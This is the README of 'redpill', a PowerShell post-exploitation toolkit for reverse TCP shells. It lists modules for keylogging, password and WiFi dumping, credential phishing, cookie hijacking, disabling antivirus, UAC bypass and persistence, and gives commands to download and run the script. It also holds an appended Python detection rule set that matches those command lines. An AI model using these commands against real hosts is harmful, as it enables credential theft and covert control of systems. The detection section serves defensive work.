Project Description
The redpill project aims to assist reverse TCP shells in post-exploitation tasks. Often in red team engagements we
need to use unconventional ways to access the target system, such as reverse TCP shells (not metasploit), in order
to bypass the defenses implemented by the system administrator. After the first stage has been completed successfully
we face another type of problem: "I have (shell) access to the target system, and now what can I do with it?"
This project consists of several PowerShell scripts that perform different post-exploitation functions and the
main script redpill.ps1, whose main job is to download, configure and execute the scripts contained in this repository.
The goal is to have a meterpreter-like experience in our reverse TCP shell prompt (meterpreter-similar options).
Folder Name | Description | Notes |
---|---|---|
Bin | Contains redpill main modules | Sysinfo |
Bypass | Contains redpill bypass scripts | Manual Download/Execution required |
modules | Contains redpill modules | Sherlock |
Utils | Contains BAT and PS1 scripts | |
CmdLet Parameters syntax\examples
This CmdLet belongs to the structure of venom v1.0.17.8 as a post-exploitation module.
venom AMSI evasion agents automatically upload this CmdLet to the %TMP% directory so that it is
easily accessible in our reverse TCP shell (shell prompt).
To List All Parameters Available, execute in powershell prompt:
.\redpill.ps1 -Help Parameters
CmdLet Parameter Name | Parameter Arguments | Description |
---|---|---|
-SysInfo | Enum | Verbose |
-GetConnections | Enum | Verbose |
-GetDnsCache | Enum | Clear |
-GetInstalled | Enum | Enumerate Remote Host Applications Installed |
-GetProcess | Enum | Kill |
-GetTasks | Enum | Create |
-GetLogs | Enum | Verbose |
-GetBrowsers | Enum | Verbose |
-Screenshot | 1 | Capture 1 Desktop Screenshot and Store it on %TMP% |
-Camera | Enum | Snap |
-StartWebServer | Python | Powershell |
-Keylogger | Start | Stop |
-MouseLogger | Start | Capture Screenshots of Mouse Clicks for 10 seconds |
-PhishCreds | Start | Brute |
-GetPasswords | Enum | Dump |
-WifiPasswords | Dump | ZipDump |
-EOP | Enum | Verbose |
-ADS | Enum | Create |
-BruteZip | $Env:TMP\archive.zip | Brute force the selected Zip archive with the help of 7z.exe |
-Upload | script.ps1 | Upload script.ps1 from attacker apache2 webroot |
-Persiste | $Env:TMP\Script.ps1 | Persist script.ps1 on every startup {BeaconHome} |
-CleanTracks | Clear | Paranoid |
-AppLocker | Enum | WhoAmi |
-FileMace | $Env:TMP\test.txt | Change File Mace {CreationTime,LastAccessTime,LastWriteTime} |
-MetaData | $Env:TMP\test.exe | Display file / application description (metadata) |
-PEHollow | GetSystem | $Env:TMP\test.exe |
-MsgBox | "Hello World." | Spawns a "Hello World." msgBox on the local host {wscriptComObject} |
-SpeakPrank | "Hello World." | Make the remote host speak the user input sentence {prank} |
-NetTrace | Enum | Aggressive enumeration with the help of netsh {native} |
-PingSweep | Enum | Verbose |
-DnsSpoof | Enum | Redirect |
-DisableAV | Query | Start |
-HiddenUser | Query | Create |
-CsOnTheFly | Compile | Execute |
-CookieHijack | Dump | History |
-UacMe | Bypass | Elevate |
To Display Detailed information about each parameter execute:
Syntax : .\redpill.ps1 -Help [ -Parameter Name ]
Example: .\redpill.ps1 -Help WifiPasswords
Instructions on how to use the CmdLet {Local tests}
This section describes how to test this CmdLet locally without exploiting a target host.
1º - Download the CmdLet from the GitHub repository to "Local Disk"
iwr -Uri https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/redpill.ps1 -OutFile redpill.ps1
2º - Set the PowerShell Execution Policy to "UnRestricted"
Set-ExecutionPolicy UnRestricted -Scope CurrentUser
3º - Browse to the "redpill.ps1" storage directory
cd C:\Users\pedro\Desktop
4º - Access the CmdLet Help Menu {All Parameters}
.\redpill.ps1 -Help Parameters
5º - Access [ -WifiPasswords ] Detailed Parameter Help
Syntax : .\redpill.ps1 -Help [ -Parameter Name ]
Example: .\redpill.ps1 -Help WifiPasswords
6º - Running the [ -WifiPasswords ] [ Dump ] Module
Syntax : .\redpill.ps1 [ -Parameter Name ] [ @argument ]
Example: .\redpill.ps1 -WifiPasswords Dump
7º - Running the [ -sysinfo ] [ Enum ] Module
Syntax : .\redpill.ps1 [ -Parameter Name ] [ @argument ]
Example: .\redpill.ps1 -sysinfo Enum
Instructions on how to use the CmdLet under Venom v1.0.17.8
1º - Execute in the reverse TCP shell prompt
[SKYNET] C:\Users\pedro\AppData\Local\Temp> powershell -File redpill.ps1 -Help Parameters
2º - Access [ -WifiPasswords ] Detailed Parameter Help
[SKYNET] C:\Users\pedro\AppData\Local\Temp> powershell -File redpill.ps1 -Help WifiPasswords
3º - Running the [ -WifiPasswords ] [ Dump ] Module
[SKYNET] C:\Users\pedro\AppData\Local\Temp> powershell -File redpill.ps1 -WifiPasswords Dump
To manually download the CmdLet for local tests, execute:
iwr -Uri https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/redpill.ps1 -OutFile redpill.ps1
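The deployment steps above (download of redpill.ps1 from the raw GitHub URL, Set-ExecutionPolicy UnRestricted, and `powershell -File redpill.ps1` launched from the %TMP% directory) are also the observable footprint a defender can hunt for in process-creation logs. The following is an added detection example written for this README, not part of the redpill or venom projects; the sample command lines are constructed and the rule names are my own.

```python
import re

# Constructed sample process-creation command lines (as seen in Sysmon Event ID 1
# or Windows Security 4688 records); not real captures.
SAMPLE_COMMAND_LINES = [
    r'powershell.exe iwr -Uri https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/redpill.ps1 -OutFile redpill.ps1',
    r'powershell.exe Set-ExecutionPolicy UnRestricted -Scope CurrentUser',
    r'powershell -File C:\Users\pedro\AppData\Local\Temp\redpill.ps1 -WifiPasswords Dump',
    r'powershell.exe -File C:\Scripts\backup.ps1',
    r'notepad.exe C:\Users\pedro\Desktop\notes.txt',
]

# Rule names are hypothetical labels chosen for this example. Each rule matches one
# of the behaviours the README describes for deploying and running the CmdLet.
RULES = [
    ("redpill-download", re.compile(r'raw\.githubusercontent\.com/r00t-3xp10it/redpill', re.I)),
    ("execpolicy-unrestricted", re.compile(r'Set-ExecutionPolicy\s+Unrestricted', re.I)),
    ("redpill-script-run", re.compile(r'redpill\.ps1', re.I)),
    # Any .ps1 launched with -File out of a ...\Temp\ path, regardless of script name.
    ("ps1-from-temp", re.compile(r'powershell(?:\.exe)?\s+-File\s+\S*\\Temp\\\S+\.ps1', re.I)),
]


def match_rules(cmdline):
    """Return the names of all rules that fire on a single command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan(lines):
    """Return (command_line, [rule names]) for every line that triggers at least one rule."""
    hits = []
    for line in lines:
        names = match_rules(line)
        if names:
            hits.append((line, names))
    return hits


if __name__ == "__main__":
    for line, names in scan(SAMPLE_COMMAND_LINES):
        print(", ".join(names), "<-", line)
```

The `ps1-from-temp` rule is deliberately broader than the redpill filename so that a renamed copy of the script uploaded to %TMP% still surfaces for review.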
Video Tutorials
Demonstration - This tutorial uses: sysinfo, GetPasswords, UacMe modules
MouseLogger - Capture Screenshots of "MouseClicks" with the help of psr.exe
PhishCreds - Phish for login credentials OR Brute Force user account password
FileMace - Change File TimeStamp {CreationTime, LastAccessTime, LastWriteTime}
CsOnTheFly - Download (from url), Auto-Compile and Execute CS scripts On-The-Fly!
EOP - Find missing software patches for privilege escalation
Acknowledgments
hax0r | Function | OS Flavor |
---|---|---|
@youhacker55 | For All the help Debugging this cmdlet (Testing BETA version) | Windows 7 x64bits @0xyg3n |
Any collaborations or bug reports are welcome.
SuspiciousShellActivity - RedTeam @2021